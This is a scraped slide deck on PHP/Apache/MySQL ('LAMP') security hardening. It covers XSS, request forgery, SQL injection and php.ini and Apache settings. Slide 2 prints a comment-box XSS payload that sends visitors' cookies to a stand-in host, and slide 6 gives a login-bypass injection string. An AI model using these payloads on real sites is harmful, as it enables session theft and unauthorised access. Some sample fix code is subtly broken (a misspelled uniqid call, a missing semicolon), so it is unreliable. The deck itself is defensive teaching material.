Download as ODP, PPTX
![Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”](https://image.slidesharecdn.com/php-mysql-security-120428080840-phpapp02/75/LAMP-security-practices-4-2048.jpg)
![Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”](https://image.slidesharecdn.com/php-mysql-security-120428080840-phpapp02/75/LAMP-security-practices-5-2048.jpg)
![SQL Injection
Ex. Input ' OR '1'='1 in userid field of login form. If
server script for authentication uses “ Select * FROM
tblusers WHERE userid = '$_GET['userid']' ”, this code will be
interpolated to “ Select * FROM tblusers WHERE userid = '' OR
'1'='1' ” which will result in valid records getting
returned from database.](https://image.slidesharecdn.com/php-mysql-security-120428080840-phpapp02/75/LAMP-security-practices-6-2048.jpg)
![SQL Injection Solution
Use mysqli_real_escape_string($_GET['userid']) for all
user supplied data
Use prepared statements:-
$statement = $connection->prepare( "SELECT * FROM tblusers
WHERE userid = ?" );
$statement->bind_param( "i", $_GET['userid'] );
$statement->execute();](https://image.slidesharecdn.com/php-mysql-security-120428080840-phpapp02/75/LAMP-security-practices-7-2048.jpg)
Uploaded byAmit Kejriwal
LAMP security practices
The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.
More Related Content
![[BDD 2025 - Mobile Development] Exploring Apple’s On-Device FoundationModels](https://cdn.slidesharecdn.com/ss_thumbnails/md-exploringappleson-devicefoundationmodels-251124030840-d690542c-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Mobile Development] Mobile Engineer and Software Engineer: Are we...](https://cdn.slidesharecdn.com/ss_thumbnails/md-mobileengineerandsoftwareengineerarewestillrelevantsidiqpermana-251127010650-55224ef1-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Artificial Intelligence] Building AI Systems That Users (and Comp...](https://cdn.slidesharecdn.com/ss_thumbnails/ai-buildingaisystemsthatusersandcompanieslove-251124030845-038f7732-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Full-Stack Development] PHP in AI Age: The Laravel Way. (Rizqy Hi...](https://cdn.slidesharecdn.com/ss_thumbnails/fs-phpinaiagethelaravelway-251125012602-ef9d330e-thumbnail.jpg?width=640&height=640&fit=bounds)
![[BDD 2025 - Mobile Development] Crafting Immersive UI with E2E and AGSL Shade...](https://cdn.slidesharecdn.com/ss_thumbnails/md-craftingimmersiveuiwithe2eandagslshaderveronicaputrianggraini-251124030840-0c677f44-thumbnail.jpg?width=640&height=640&fit=bounds)
LAMP security practices
- 1. LAMP Security Practices XSS RequestForgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
- 2. XSS A hacker poststhe below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
- 3. XSS solution All usersubmitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
- 4. Request Forgeries Create, Updateand Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
- 5. Request Forgeries Create, Updateand Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
- 6. SQL Injection Ex. Input' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
- 7. SQL Injection Solution Usemysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
- 8. Disable PHP information Runthe command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
- 9. Disable Server Information Runthe command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
- 10. Disable unnecessary modules Usephp -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
- 11. Log PHP errors Usefollowing to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
- 12. Disable File Uploads Ifyour site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
- 13. DoS attack To avoidscript taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
- 14. Remote Code Execution Remoteurls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
- 15. Disable Dangerous PHPfunctions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
- 16. Limit Access toFile System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
- 17. Session file path Sessionfiles must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
- 18. Write protect confand application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
- 19. Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html